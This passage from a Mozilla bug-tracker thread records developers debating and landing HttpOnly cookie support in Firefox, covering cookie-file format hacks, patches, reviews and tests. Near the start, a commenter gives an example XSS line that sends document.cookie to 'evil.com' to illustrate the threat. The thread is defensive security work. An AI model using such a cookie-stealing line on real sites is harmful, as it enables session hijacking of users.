2) security="sandbox" attribute for all elements.
Example for (2):
<div security="sandbox">
<script>
/// This won't work, nor will any other XSS silliness if 'sandbox' is strict enough...
location = "http://evil.com/"+escape(document.cookie);
</script>
</div>
Indeed, 'security' could have values as simple as 'noscript'.
Apologies if I've missed the point (as is entirely possible :) ).
Comment 56•18 years ago
Why does firefox not have any security for cookies?
While this discussion has dragged on since 2002, the fact is that millions of people remain vulnerable.
Please do something about this; what cannot continue is this insecurity where any XSS bug in a site makes the user lose all of their cookie information because firefox does not protect them.
Regards,
A Firefox user whose information was stolen through an XSS hole because firefox has no security for cookies.
Comment 57•18 years ago
> 2) security="sandbox" attribute for all elements.
This idea has been proposed many times. It's not really feasible for parts of a page, only for the whole page - when it reduces to Content Restrictions:
http://www.gerv.net/security/content-restrictions/
Anyway, that's entirely irrelevant to whether or not we should implement an IE-compatible HTTPOnly.
Gerv
Comment 58•18 years ago
(In reply to comment #57)
> > 2) security="sandbox" attribute for all elements.
>
> This idea has been proposed many times. It's not really feasible for parts of a
> page, only for the whole page - when it reduces to Content Restrictions:
> http://www.gerv.net/security/content-restrictions/
>
Gerv, may I ask what specifically about that idea is not feasible? Is it related to the Moz core specifically, or if it's the idea in general, what is that reason? IMO, that "proposed many times" idea seems to be the most practical yet flexible (allowing valid script to run) solution -- at least for site owners/authors.
Take the classic and concrete webmail example that we know so well, where there are plenty of the site's own valid scripts running, but the webmail author simply wants to disable any scripts inside the email content (inside of div foo). We know that it is most definitely very, very dangerous (and very inefficient) to require the webmail writer to handle sanitizing for the foreign content (handle SCRIPT, all event handlers, agent variations in tag parsing, etc).
However as you say this is a separate issue from this bug, though I still believe subs@'s comment (insofar as sandboxing portions of a page) has merit, though it is not a complete solution - we also need the header based controls for simple browsing of untrusted uploaded files. And whether the sandbox div's scripts should run in an isolated domain or be disabled altogether is another topic.
It is noted that one technicality that subs@ didn't mention was the need for an opening and closing boundary/random string to prevent spoofing (this boundary could be created by client-JS in fact), ie by bad DOM structure in the email or merely closing the div.
Gerv, I agree that your proposal is very powerful and allows much finer-grained control. Although relative to the sandboxed-DIV idea it is seemingly more complex to implement (both in the agent, and site authors require access to response headers), potentially to learn, and there is more room for error by users (by nature of having more controls). Also its level of control may mean the spec must be evolved to support new/changing technologies (like embedded plugins).
I do know that for most cases, site owners who need to present foreign code would rather just completely disable scripting altogether -- and ideally only for the foreign code's block... instead of being relegated to pushing the foreign content into an iframe or JS/XmlHTTP include but from a sandbox domain as we do now.
Comment 59•18 years ago
I was about to write a reply, but Ken has pretty much said it all. (And yes, obviously random strings are needed for the sandbox boundaries.) I raised it in this bug because element-sandboxing + uploaded file restrictions would obviate the need for fixing this bug.
Comment 60•18 years ago
(In reply to comment #59)
> I raised it in this bug because element-sandboxing + uploaded file
> restrictions would obviate the need for fixing this bug.
No it wouldn't! HttpOnly is -already- used by sites and Firefox users would immediately benefit if this bug were implemented. Sites not already using it could start without re-writing any content whatsoever.
More complex sandboxing is great but no one benefits until the content is changed to take advantage of it.
Comment 61•18 years ago
(In reply to comment #60)
> No it wouldn't! HttpOnly is -already- used by sites and Firefox users would
> immediately benefit if this bug were implemented. Sites not already using it
> could start without re-writing any content whatsoever.
I hadn't considered that. I guess they are separate issues then. Sorry for the bugspam, all.
Comment 62•18 years ago
> > restrictions would obviate the need for fixing this bug.
>
> No it wouldn't! HttpOnly is -already- used by sites and Firefox users would
> immediately benefit if this bug were implemented. Sites not already using it
> could start without re-writing any content whatsoever.
>
> More complex sandboxing is great but no one benefits until the content is
> changed to take advantage of it.
>
I still think the http-only cookie idea has some value (and I'd stated this in earlier comments), but have come to realize (after researching webmail and file-upload site sanitizing) that it is actually deeply inadequate. There are so, so many other attack vectors -- the http-only cookie doesn't even address 10% of them. Maybe less. The fact is that *any* foreign scripting access inside of one's domains is a grave, grave risk. So now, I think that while implementing this would do *some* good, the effort is much better spent implementing something new -- along the lines of header based policies, and also the sandboxing-div type of idea (the latter being more robust, flexible and natural for mixed-domain environments IMO). And I don't believe you were bugspamming, subs@.
Comment 63•18 years ago
Let's fix this one. I'm assuming Firefox 3 is the only realistic milestone, given web compat constraints on Firefox 2.
Target Milestone: mozilla1.8alpha1 → mozilla1.9alpha
Comment 64•18 years ago
> Gerv, may I ask what specifically about that idea is not feasible?
I defer to the parser and layout hackers for a full explanation, but as I understand it, it's a combination of: it's hard to define securely where the block ends; it's hard to restrict the activities of script within a single page in the way required; it's hard to prevent the activities of script only having an effect in a particular area of the page.
In addition, we already have a well-defined system for including one type of content in another, with the possibility of establishing security boundaries - it's called an <iframe>. Microsoft has, I believe, got some security stuff you can invoke at that boundary. But again, it's two different documents, and so Content-Restrictions is, I believe, the way to go.
Note that one would not have to implement all of Content-Restrictions at once. And I designed it to fit with (as far as I understand it) our internal capabilities model.
But please, can we not discuss this in a bug which is entirely irrelevant to the idea?
Gerv
Comment 65•18 years ago
IBM has some internal apps that would benefit from httponly (because they use subdomains, etc. as described in comment 47) and they would really like to see httponly implemented in Firefox 2.0.0.x.
The only downside to implementing httponly (other than the need for coding and testing) is that it would give some other webmasters a false sense of security, right?
Comment 66•18 years ago
this patch sets up HttpOnly, but doesn't change ::Read or ::Write yet.
Comment 67•18 years ago
Attachment #252736 - Attachment is obsolete: true
Comment 68•18 years ago
Attachment #252737 - Attachment is obsolete: true
Updated•18 years ago
Attachment #252740 - Attachment is patch: true
Attachment #252740 - Attachment mime type: application/octet-stream → text/plain
Comment 69•18 years ago
(In reply to comment #65)
>
> The only downside to implementing httponly (other than the need for coding and
> testing) is that it would give some other webmasters a false sense of security,
> right?
The other concern is our policy on users that switch back and forth from an older version of Fx. I'm thinking we should do a one-time migration, with the caveat that any "clear cookies" operation will delete the old file as well.
Comment 70•18 years ago
Why do we need to migrate the file? The whole point of the ugly-as-sin comment-hack this patch implements is to avoid having to do that. If we're changing to a new file let's just change the actual format and not hack at it -- but then you're into bug 230933 (also see comment 43).
There is no web-compatibility reason not to support HttpOnly in 2.0.0.x. Switching to a whole new file might be a reason not to do it in 2.0.0.x (certainly not 2.0.0.2) since it raises a lot more issues and places to fail such as migration. If your target is Gecko 1.9 you ought to work on bug 230933 instead and include HttpOnly as a subset.
What happens if we treat HttpOnly cookies as session cookies and don't write them out at all? No file compatibility issues, it'd be easy. People would be arguably safer, but I guess wouldn't like having to log in all the time.
Comment 71•18 years ago
(In reply to comment #70)
> Why do we need to migrate the file? The whole point of the ugly-as-sin
> comment-hack this patch implements is to avoid having to do that. If we're
> changing to a new file let's just change the actual format and not hack at it
> -- but then you're into bug 230933 (also see comment 43).
"just". If we want to get this on the 2.0 branch, we shouldn't switch to an entirely new format, new parser, new dependencies, etc. If we want to go for bug 230933, that's an easy fix, but it shouldn't go on the branch.
>
> If your target is Gecko 1.9 you ought to work on bug 230933
> instead and include HttpOnly as a subset.
OK. Should we mark this wontfix, then?
>
> What happens if we treat HttpOnly cookies as session cookies and don't write
> them out at all? No file compatibility issues, it'd be easy. People would be
> arguably safer, but I guess wouldn't like having to log in all the time.
>
non-starter, imho.
Comment 72•18 years ago
(In reply to comment #71)
> "just". If we want to get this on the 2.0 branch, we shouldn't switch to an
> entirely new format, new parser, new dependencies, etc. If we want to go for
> bug 230933, that's an easy fix, but it shouldn't go on the branch.
Didn't I say that? My question was if we want it on the 2.0 branch (and I personally do) why do you need to migrate to a new file at all when the point of this bug's hack is to live in the same file?
> OK. Should we mark this wontfix, then?
No, regardless of file format this is a feature we want. Bug 230933 is "migrate cookies to a new format"; this is still the HttpOnly part of it.
Comment 73•18 years ago
So does anyone have any suggestions on how we could do this on the 1.8 branch? Like the idea of a second cookies file just to store the httponly characteristic? Or something else clever?
Comment 74•18 years ago
> why do you need to migrate to a new file at all when the point of this bug's hack is to live in the same file?
That's one of the points. The problem with putting them in the same file in a comment is that a user that turns on 1.5 will lose them (and possibly replace them with non-HttpOnly cookies), since it looks to me like the entire file is read into memory at startup and then overwritten on shutdown.
We need to decide on acceptable security and usability trade-offs.
1.) Is it OK for users that downgrade to lose their HttpOnly cookies? When they switch back to an HttpOnly-Enabled Fx, they may have non-HttpOnly cookies in their place. This may be acceptable, since it mirrors the situation in the initial upgrade.
2.) I think the initial patch's strategy of surrounding the cookies with comments is not good, since it will downgrade HttpOnly cookies to normal ones in older Fx versions. Better to lose them by placing the entire line in a comment. mkaply and dveditz: Agree?
(In reply to comment #73)
> So does anyone have any suggestions on how we could do this on the 1.8 branch?
> Liek the idea of a second cookies file just to store the httponly
> characteristic? Or something else clever?
That would have the same problem as #2 above. However, if #2 is OK, then it's something to consider.
Comment 75•18 years ago
Comment on attachment 252740 [details] [diff] [review]
nsCookieService::Write method altered
attachment 252737 [details] [diff] [review] is a better base to work from
Attachment #252740 - Attachment is obsolete: true
Comment 76•18 years ago
I have another idea for a "clever hack". (Should work fine with older versions and not lose any information as well.) It should also work well with any 3rd party apps that don't deal with comments. (If it is even doable. I'm just throwing the idea out there.)
Say we have cookie "xyz" for domain "foo.com":
.foo.com TRUE / FALSE 1174939130 xyz abc
If we want to specify it as an httponly cookie we could add another cookie like so:
.$http_only.foo.com TRUE / FALSE 1174939130 xyz abc
I'm not sure what the parser allows here, but the idea is that $http_only is some "subdomain" that will never be used. That way it will never be sent to a server.
We could also just utilize the $http_only version and forget about the standard .foo.com behavior. That would make sure that this cookie is not used in older browsers, and yet still preserved. (If an older browser adds a non-$http_only version, it wouldn't matter as the older version could keep using it while the new browser version would utilize the $http_only version.)
Just another idea for you guys to chew on.
Comment 77•18 years ago
(In reply to comment #74)
> 2.) I think the initial patch's strategy of surrounding the cookies with
> comments is not good, since it will downgrade HttpOnly cookies to normal ones
> in older Fx versions. Better to lose them by placing the entire line in a
> comment. mkaply and dveditz: Agree?
... at which point the user will log in to the site again (while cursing the broken browser), and end up with a non-HttpOnly cookie just the same?
Comment 78•18 years ago
+1 to Josh’s suggested hack (.$http_only.domain.com)
Comment 79•18 years ago
(In reply to comment #77)
>
> ... at which point the user will log in to the site again (while cursing the
> broken browser), and end up with a non-HttpOnly cookie just the same?
Yes. But that assumes that the same cookie is issued to UAs that don't support HttpOnly. In other words, is the downgrade a concern?
Comment 80•18 years ago
This one stores HttpOnly cookies on a line prefixed with a comment, like so:
#HttpOnly_.livejournal.com livejournal.com TRUE / FALSE 1175031894 ljuniq
Doing it this way prevents nasty merge situations when going from old back to new. If we hacked HttpOnly so that it survives the use of an older browser (but isn't readable there), we would get merging situations like the following when the user went back to an HttpOnly-Enabled Fx:
$HttpOnly_.livejournal.com livejournal.com TRUE / FALSE 1175031894 ljuniq
.livejournal.com livejournal.com TRUE / FALSE 2342434534 ljuniq
Attachment #138799 - Attachment is obsolete: true
Attachment #186756 - Attachment is obsolete: true
Comment 81•18 years ago
(In reply to comment #80)
> This one stores HttpOnly cookies on a line prefixed with a comment, like so:
> #HttpOnly_.livejournal.com livejournal.com TRUE / FALSE 1175031894 ljuniq
> Doing it this way prevents nasty merge situations when going from old back to
> new. If we hacked HttpOnly so that it survives the use of an older browser (but
> isn't readable there), we would get merging situations like the following when
> the user went back to an HttpOnly-Enabled Fx:
>
> $HttpOnly_.livejournal.com livejournal.com TRUE / FALSE 1175031894 ljuniq
> .livejournal.com livejournal.com TRUE / FALSE 2342434534 ljuniq
I think the 'merge situation' could be good, because it allows us to know that we should just delete both cookies. Otherwise (with the comment method), we'll be using an unprotected cookie. (Because when we switch back up from the older browser, we now have an unprotected cookie. Thus we've lost our security.)
As an alternative, an $httponly.domain-capable browser could just always use the httponly version if it's there.
Also, I thought of a downside to this domain method. Current 3rd party applications will not be able to read the cookie unless we store it both ways. (.$httponly.domain and .domain) Not sure if that's a big issue or not. It may be arguable that the 3rd party application should be recoded to be aware of the httponly flag anyhow.
I'm happy with either solution really. More security is better than less and the percentage of users going from new->old->new is probably an insignificant percentage. Even the end-of-line comment hack would be fine with me, although I'm a bit worried how 3rd party apps might behave with that.
Comment 82•18 years ago
(In reply to comment #81)
>
> I think the 'merge situation' could be good, because it allows us to know that
> we should just delete both cookies. Otherwise (with the comment method), we'll
> be using an unprotected cookie.
Actually, it occurs to me that sending both is a change in web compatibility, so we can't do that according to the branch policy.
> (Because when we switch back up from the older
> browser, we now have an unprotected cookie. Thus we've lost our security.)
>
The initial upgrade will be much, much more common and you'll have to deal with it there anyway.
>
> I'm happy with either solution really. More security is better than less and
> the percentage of users going from new->old->new is probably an insignificant
> percentage.
I think that's how I feel too.
Updated•18 years ago
Attachment #252948 -
Flags: review?(benjamin)
Comment 83•18 years ago
(In reply to comment #82)
> Actually, it occurs to me that sending both is a change in web compatibility,
> so we can't do that according to the branch policy.
I didn't mean for both to be sent, but to delete both. (Or just send the httponly one.) Sending both is definitely out of the question.
> The initial upgrade will be much, much more common and you'll have to deal with
> it there anyway.
True. The comment method you use is probably simpler anyhow. Simpler = less prone to error. Thanks for taking the time to create a patch to get this bug moving.
My one concern: I have a feeling this might cause problems with some 3rd-party programs, such as download managers that pull cookie information in order to download within an existing session, but they should be able to adapt pretty quickly. Problems are probably bound to happen no matter what change is made to the cookies.txt file, though. (Including the end-of-line comment hack; I wouldn't be surprised if download managers don't check for comments at the end of a line.)
On another note, and this should probably be a new bug, it'd be nice if the URL at the top of the cookies.txt file pointed to a URL that still works. I tried the following and it no longer exists:
http://www.netscape.com/newsref/std/cookie_spec.html
Comment 84•18 years ago
realized there's no reason to expose this to XPCOM
Attachment #252948 -
Attachment is obsolete: true
Attachment #252948 -
Flags: review?(benjamin)
Updated•18 years ago
Attachment #253178 -
Flags: review?(benjamin)
Comment 85•18 years ago
sorry for all the bugspam
Attachment #253178 -
Attachment is obsolete: true
Attachment #253179 -
Flags: review?(benjamin)
Attachment #253178 -
Flags: review?(benjamin)
Comment 86•18 years ago
My only question: while we are going to the effort of hacking the format around, is it worth trying to make it more extensible in the future, just in case we are still using cookies.txt when (to pick a random, vaguely plausible example) we decide to send cookies served over EV SSL connections only over EV, and therefore require an "EVOnly" attribute?
Instead of:
+ * #HttpOnly_host \t isDomain \t path \t secure \t expires \t name \t cookie
How about:
+ * #ExtendedFormat version=2,httpOnly=1,name=value \t host \t isDomain ...
?
version must be the first entry in the new comma-separated param list; cookies with an unknown version are ignored; unknown name/value pairs are ignored; all the usual compatibility stuff.
This would require:
- Change the prefix
- Write the current version
- Split and parse the new params section
Even if we don't do this, let's separate "#HttpOnly" from the domain by a \t (the standard separator for the file) rather than an underscore.
Gerv
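(Editorial sketch only: the proposal above was not adopted (see the next two comments), but this is roughly the param parsing it would have required; all names are invented here:)
#include <map>
#include <sstream>
#include <string>
// Split "version=2,httpOnly=1,name=value" into pairs. A reader would check
// result["version"] first and ignore any keys it does not understand.
static std::map<std::string, std::string> ParseExtendedParams(const std::string& params)
{
    std::map<std::string, std::string> result;
    std::istringstream in(params);
    std::string pair;
    while (std::getline(in, pair, ',')) {
        std::string::size_type eq = pair.find('=');
        if (eq != std::string::npos)
            result[pair.substr(0, eq)] = pair.substr(eq + 1);
    }
    return result;
}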
Comment 87•18 years ago
(In reply to comment #86)
> My only question: while we are going to the effort of hacking the format
> around, is it worth trying to make it more extensible in the future
I don't think so. Instead, bug 230933 should block Fx3.
Comment 88•18 years ago
(In reply to comment #86)
> My only question: while we are going to the effort of hacking the format
> around, is it worth trying to make it more extensible in the future
<zombie type="coming to eat you">
Noooooooo.....!
</zombie>
That is exactly what's been stalling this bug for years: waiting for the magic extensible file format that never gets written. Please let's just do a narrow HttpOnly comment-hack extension.
I'm with Gerv in preferring HttpOnly\t to HttpOnly_ on consistency/aesthetic grounds, but I don't really care all that much at this point if arguing about it further delays this feature.
Comment 89•18 years ago
Comment on attachment 253179 [details] [diff] [review]
fix nits / don't change interface
r=dveditz
Attachment #253179 -
Flags: review+
Comment 90•18 years ago
Should nsICookie2 be modified, to add the httponly attribute, so you can get
it? (not that there are any callers yet, but that might change. Maybe
extensions want to use it)
(In reply to comment #81)
> I think the 'merge situation' could be good, because it allows us to know that
> we should just delete both cookies. Otherwise (with the comment method), we'll
> be using an unprotected cookie. (Because when we switch back up from the older
> browser, we now have an unprotected cookie. Thus we've lost our security.)
I don't see this remark being answered here. I think it is a good remark, and
should be reflected into what we do.
A related question: What happens to your existing cookies when upgrading? The
http-only cookie might very well be already in your cookies.txt, but not marked
as http-only. If you visit the site, and it will re-set the cookie, will the
(now http-only) cookie overwrite the existing cookie, or be added as a new
cookie?
Comment 91•18 years ago
Comment on attachment 253179 [details] [diff] [review]
fix nits / don't change interface
The code looks fine. I'm not making a policy decision of course.
Attachment #253179 -
Flags: review?(benjamin) → review+
Comment 92•18 years ago
It would be very nice to have unit tests for this... we already have a few cookie tests, so I think there's already a framework in place.
Comment 93•18 years ago
Is this ready to go in on the trunk then for some baking?
Comment 94•18 years ago
(In reply to comment #93)
> Is this ready to go in on the trunk then for some baking?
No, it needs test coverage.
I also see some points raised by mvl in comment #90, and he's in the blame for this file. It looks to me like all of the points he raises would need additional code, and change very little of what's in my patch. So, I propose that the patch goes on trunk, with the possibility of additional changes from mvl or someone else (I won't be doing more).
Comment 95•18 years ago
Reading the code some more, I now think that my issue in comment 90 isn't that much of an issue. A cookie that gets re-set will always overwrite the old cookie. And because the http-only attribute isn't taken into account when looking for an existing cookie, the unprotected cookie will get overwritten by a protected one.
Adding the attribute to nsICookie2 should be like 2 lines of code. (plus some comments documenting it.) I think we should do that.
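(Editorial illustration of the overwrite point above, assuming the usual host/name/path matching; this is not the nsCookieService lookup itself:)
#include <string>
struct CookieKey {
    std::string host, name, path;
};
// Whether two cookies are "the same cookie" for replacement purposes.
// The HttpOnly flag is deliberately not part of the key, so a newly set
// HttpOnly cookie simply replaces an older, unprotected one.
static bool SameCookie(const CookieKey& a, const CookieKey& b)
{
    return a.host == b.host && a.name == b.name && a.path == b.path;
}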
Comment 96•18 years ago
I've added the nsICookie2 change to this patch. I didn't rev the IID for nsICookie2 since it wasn't revved the last time the interface changed.
Comment 97•18 years ago
Comment on attachment 256810 [details] [diff] [review]
Patch with nsCookie2 change
asking for review of just the cookie2 change
Attachment #256810 -
Flags: review?(mvl)
Comment 98•18 years ago
Comment on attachment 256810 [details] [diff] [review]
Patch with nsCookie2 change
r=mvl on the nsICookie2 changes.
Attachment #256810 -
Flags: review?(mvl) → review+
Comment 99•18 years ago
Checked in. Once this is baked, I'll ask for 1.8 branch approval.
Status: NEW → RESOLVED
Closed: 18 years ago
Resolution: --- → FIXED
Comment 100•18 years ago
(In reply to comment #99)
> Checked in. Once this is baked, I'll ask for 1.8 branch approval.
>
This code doesn't have SR and doesn't have the unit tests required by comment #94. Please back it out until both of those conditions are met.
Comment 101•18 years ago
(In reply to comment #100)
> This code doesn't have SR and doesn't have the unit tests required by comment
> #94. Please back it out until both of those conditions are met.
Both Dan Veditz and bsmedberg are super-reviewers, and both reviewed the code.
As far as the unit tests go, creating a unit test for this is server-dependent, so it can't necessarily even be run on the servers where Mozilla testcases are run.
Are the mozilla servers running PHP 5.2?
Comment 102•18 years ago
(In reply to comment #101)
> (In reply to comment #100)
> > This code doesn't have SR and doesn't have the unit tests required by comment
> > #94. Please back it out until both of those conditions are met.
>
> Both dan veditz and bsmedberg are super reviewers, and both reviewed the code.
>
Doesn't matter. It's not clear that this patch is OK with everyone from reading the comments. An SR+ will make that decision.
> As far as the unit tests go, creating a unit test for this is server dependent
Not true. We have lots of tests for cookie parsing, but none for this. So, back it out please.
Comment 103•18 years ago
fwiw, your nsICookie2 needs a new IID...
Comment 104•18 years ago
(In reply to comment #103)
> fwiw, your nsICookie2 needs a new IID...
Any idea why when dwitte added a parameter, he didn't rev it:
http://bonsai.mozilla.org/cvsview2.cgi?diff_mode=context&whitespace_mode=show&file=nsICookie2.idl&branch=&root=/cvsroot&subdir=mozilla/netwerk/cookie/public&command=DIFF_FRAMESET&rev1=1.2&rev2=1.3
> > As far as the unit tests go, creating a unit test for this is server dependent
> Not true. We have lots of tests for cookie parsing, but none for this.
> So, back it out please.
Please point me to these testcases; I can't find them on mozilla.org.
Also, what version of PHP do we have on the server? Testing httpOnly requires a specific server-side change; you can't just write an HTML testcase.
Comment 105•18 years ago
> Any idea why when dwitte added a parameter, he didn't rev it
We weren't as careful about binary compatibility in 2003, IIRC.
Comment 106•18 years ago
(In reply to comment #104)
>
> Please point me to these testcases please. I can't find them on mozilla.org
http://lxr.mozilla.org/seamonkey/source/netwerk/test/TestCookie.cpp
This is beside the point, btw.
comment #93: Is this ready to go in on the trunk then for some baking?
comment #94: No, it needs test coverage.
comment #99: Checked in. Once this is baked, I'll ask for 1.8 branch approval.
Was there something unclear about comment #94?
Comment 107•18 years ago
note that we've got a webserver written in JS for unit tests, see netwerk/test/httpserver.
Comment 108•18 years ago
I backed out this patch; it shouldn't go out in the nightlies with so many unanswered questions. We can get it in some other day. I haven't seen satisfactory explanations for the lack of SR, the binary incompatibility, or the lack of unit tests. Maybe tomorrow I won't get lectured on the basics of my patch, though I will note it would be pretty foolish to land it if you don't think I understand it.
Checking in public/nsICookie2.idl;
/cvsroot/mozilla/netwerk/cookie/public/nsICookie2.idl,v <-- nsICookie2.idl
new revision: 1.5; previous revision: 1.4
done
Checking in src/nsCookie.cpp;
/cvsroot/mozilla/netwerk/cookie/src/nsCookie.cpp,v <-- nsCookie.cpp
new revision: 1.11; previous revision: 1.10
done
Checking in src/nsCookie.h;
/cvsroot/mozilla/netwerk/cookie/src/nsCookie.h,v <-- nsCookie.h
new revision: 1.13; previous revision: 1.12
done
Checking in src/nsCookieService.cpp;
/cvsroot/mozilla/netwerk/cookie/src/nsCookieService.cpp,v <-- nsCookieService.cpp
new revision: 1.51; previous revision: 1.50
done
Checking in src/nsCookieService.h;
/cvsroot/mozilla/netwerk/cookie/src/nsCookieService.h,v <-- nsCookieService.h
new revision: 1.22; previous revision: 1.21
done
Status: RESOLVED → REOPENED
Resolution: FIXED → ---
Comment 109•18 years ago
PHP Unit test. Will work on any server
Comment 110•18 years ago
Comment on attachment 256810 [details] [diff] [review]
Patch with nsCookie2 change
darin
Attachment #256810 -
Flags: superreview?
Comment 111•18 years ago
(In reply to comment #109)
> Created an attachment (id=256993) [details]
> Unit test
>
> PHP Unit test. Will work on any server
>
The unit test needs to run in the |make check| target, like the ones I linked.
Comment 112•18 years ago
Comment on attachment 256810 [details] [diff] [review]
Patch with nsCookie2 change
You should change the UUID of nsICookie2 since its vtable is changing.
Looks good, otherwise.
Updated•18 years ago
Attachment #256993 -
Flags: review-
Comment 113•18 years ago
(In reply to comment #111)
> The unit test needs to run in the |make check| target, like the ones I linked.
>
I've looked through that file, and testing this in there really doesn't make sense.
What exactly are you looking to have tested? I know you are saying "unit test", but what do you mean in this context?
I realize my testcase is technically a "function test".
Instead of complaining about the lack of test coverage, why don't you lend a hand, considering you were involved in six out of the nine patches in this bug?
Comment 114•18 years ago
If you want to write a testcase in TestCookie.cpp, you can check for a difference between calling getCookieString and getCookieStringFromHttp on nsICookieService. The first should not return httponly cookies.
Besides, there should be a comment in nsICookieService that explains the difference. Originally, both returned the same thing, so one was mostly redundant (and the comment says so). It is no longer redundant, so that comment should be removed.
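(Editorial sketch of the check described above, in the style of TestCookie.cpp; the nsICookieService call signatures are approximate and should be verified against the IDL, and the test hostname is made up:)
// boilerplate from TestCookie.cpp elided
nsCOMPtr<nsICookieService> cookieService =
    do_GetService("@mozilla.org/cookieService;1");
nsCOMPtr<nsIURI> uri;
NS_NewURI(getter_AddRefs(uri), "http://httponly.test/");
// set a cookie as if it arrived in an HTTP response header
cookieService->SetCookieStringFromHttp(uri, nsnull, nsnull,
                                       "test=httponly; HttpOnly", nsnull, nsnull);
nsXPIDLCString cookie;
// script path: the HttpOnly cookie must NOT come back
cookieService->GetCookieString(uri, nsnull, getter_Copies(cookie));
// expect: cookie is empty
// HTTP path: the cookie must still be returned to the server
cookieService->GetCookieStringFromHttp(uri, nsnull, nsnull, getter_Copies(cookie));
// expect: cookie == "test=httponly"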
Comment 115•18 years ago
This test uses TestCookie to test the functionality. I've also updated the cookie service comments to indicate that those functions are no longer redundant.
When this is rechecked in, I will also use a new IID.
Attachment #256993 -
Attachment is obsolete: true
Attachment #257378 -
Flags: review?
Updated•18 years ago
Attachment #257378 -
Flags: review? → review?(sayrer)
Comment 116•18 years ago
Comment on attachment 257378 [details] [diff] [review]
Unit test using TestCookie
Thank you.
Attachment #257378 -
Flags: review?(sayrer) → review+
Comment 117•18 years ago
Comment on attachment 256810 [details] [diff] [review]
Patch with nsCookie2 change
That comment from darin was a super review that I specifically asked for.
Attachment #256810 -
Flags: superreview? → superreview+
Updated•18 years ago
Status: REOPENED → RESOLVED
Closed: 18 years ago → 18 years ago
Resolution: --- → FIXED
Comment 118•18 years ago
Comment on attachment 256810 [details] [diff] [review]
Patch with nsCookie2 change
This baked on the trunk for a while. It would be really nice to have on the 1.8 branch. I realize it is an interface change. In theory, that change could be left off on the branch...
Attachment #256810 -
Flags: approval1.8.1.4?
Comment 119•18 years ago
Something went wrong; the cookies are not being sent back, or something along those lines. See:
bug #315699 comment #32
> I can consistently encounter this bug using build Mozilla/5.0 (Windows; U;
> Windows NT 5.1; en-US; rv:1.9a3pre) Gecko/20070321 Minefield/3.0a3pre, on the
> site http://forums.beyondunreal.com, which uses vBulletin Version 3.6.5.
>
vBulletin uses httponly for cookies that contain your userid,
password-hash and sessionhash since vB 3.6.1. Login works normally in IE 7, which supports httponly cookies.
Comment 120•18 years ago
looks like one of us (probably me) transposed some parameters. see bug 375488.
Depends on: 375488
Comment 121•18 years ago
Comment on attachment 256810 [details] [diff] [review]
Patch with nsCookie2 change
not approving this patch for the branch. Would need a patch that
- doesn't change interfaces (you can add ugly _MOZILLA_1_8_BRANCH interfaces if you need to)
- incorporates regression fix for bug 375488
Attachment #256810 -
Flags: approval1.8.1.4? → approval1.8.1.4-
Updated•18 years ago
Flags: wanted1.8.1.x+
Comment 122•18 years ago
Actually, this patch uses cookie changes that were part of bug 295994 (security-sensitive). I'm looking at porting this patch so it doesn't use the changes from bug 295994. Any help would be appreciated.
Comment 123•18 years ago
The problem is that there was no way to convey the fact that you were calling GetCookieString vs GetCookieStringFromHttp
My solution was to add a GetCookieStringFromHttpInternal that takes the extra parameter that indicates who called us.
With this change, I was able to use most of the other code.
I also had to use the MOZILLA_1_8_BRANCH hack.
I've tested this and it works as designed.
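(Editorial sketch of the shape described above; the actual branch patch may differ, and the aHttpBound parameter name is invented here:)
// Both public entry points funnel into one internal method that knows
// whether the caller is HTTP (may see HttpOnly cookies) or script (may not).
nsresult
nsCookieService::GetCookieStringFromHttpInternal(nsIURI *aHostURI,
                                                 nsIURI *aFirstURI,
                                                 nsIChannel *aChannel,
                                                 PRBool aHttpBound,
                                                 char **aCookie)
{
  // ... existing lookup code, skipping cookies marked HttpOnly
  // whenever aHttpBound is PR_FALSE ...
  return NS_OK;
}
NS_IMETHODIMP
nsCookieService::GetCookieString(nsIURI *aHostURI, nsIChannel *aChannel,
                                 char **aCookie)
{
  // script/XPCOM callers are not HTTP-bound, so HttpOnly cookies are filtered
  return GetCookieStringFromHttpInternal(aHostURI, nsnull, aChannel,
                                         PR_FALSE, aCookie);
}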
Comment 124•18 years ago
(In reply to comment #123)
> Created an attachment (id=260051) [details]
> Patch for the 1.8 branch
>
> The problem is that there was no way to convey the fact that you were calling
> GetCookieString vs GetCookieStringFromHttp
>
> My solution was to add a GetCookieStringFromHttpInternal that takes the extra
> parameter that indicates who called us.
>
> With this change, I was able to use most of the other code.
>
> I also had to use the MOZILLA_1_8_BRANCH hack.
>
> I've tested this and it works as designed.
>
hm, but names of all cookies are missing.
example:
#HttpOnly_ FALSE / FALSE 1206921018 bbuserid 208
FALSE / FALSE 1206921018 bblastactivity 0
Comment 125•18 years ago
(In reply to comment #124)
> hm, but names of all cookies are missing.
>
> example:
> #HttpOnly_ FALSE / FALSE 1206921018 bbuserid 208
> FALSE / FALSE 1206921018 bblastactivity 0
>
name <> domain (it's the domain field that's missing in those lines, not the cookie name)
Comment 126•18 years ago
same as previous patch by Michael Kaply but fixed the missing cookie-domain ;-)
Comment 127•18 years ago
(In reply to comment #126)
> Created an attachment (id=260254) [details]
> Patch for the 1.8 branch (fixed)
>
> same as previous patch by Michael Kaply but fixed the missing cookie-domain ;-)
>
doh. Bad cut and paste when I was merging that part of the patch.
What do folks think of this approach in general, to minimize change on the 1.8 branch?
Updated•18 years ago
Attachment #260254 -
Flags: superreview?(darin.moz)
Attachment #260254 -
Flags: review?(mvl)
Comment 128•18 years ago
Comment on attachment 260254 [details] [diff] [review]
Patch for the 1.8 branch (fixed)
I don't see why you can't use the same approach as on trunk (with CookieStringFromArray instead of GetCookieStringFromHttpInternal).
What's the main difference? I would prefer to use the already-tested trunk code on the branch, instead of trying something new.
Comment 129•18 years ago
To quote bsmedberg from the other bug:
> Since 1.8 is past and this is significantly risky, I'm going to let this sit
> and wait for supercookies to develop before proceeding.
The bug that made the GetCookieStringFromList change (bug 295994) was totally unrelated to this, and there must be a reason bsmedberg never put it on the branch, especially since it is a security-sensitive bug.
Updated•18 years ago
Attachment #260254 -
Flags: superreview?(darin.moz) → superreview+
Comment 130•18 years ago
Comment on attachment 260254 [details] [diff] [review]
Patch for the 1.8 branch (fixed)
ok, r=mvl
Attachment #260254 -
Flags: review?(mvl) → review+
Comment 131•18 years ago
Comment on attachment 260254 [details] [diff] [review]
Patch for the 1.8 branch (fixed)
Probably too late for 1.8.1.4, and not even sure there's buy-in to get this on the branch, but nominating anyway.
Attachment #260254 -
Flags: approval1.8.1.4?
Comment 132•18 years ago
Comment on attachment 260254 [details] [diff] [review]
Patch for the 1.8 branch (fixed)
I feel better waiting until early in the next release than trying to rush this in now.
Attachment #260254 -
Flags: approval1.8.1.4? → approval1.8.1.5?
Updated•18 years ago
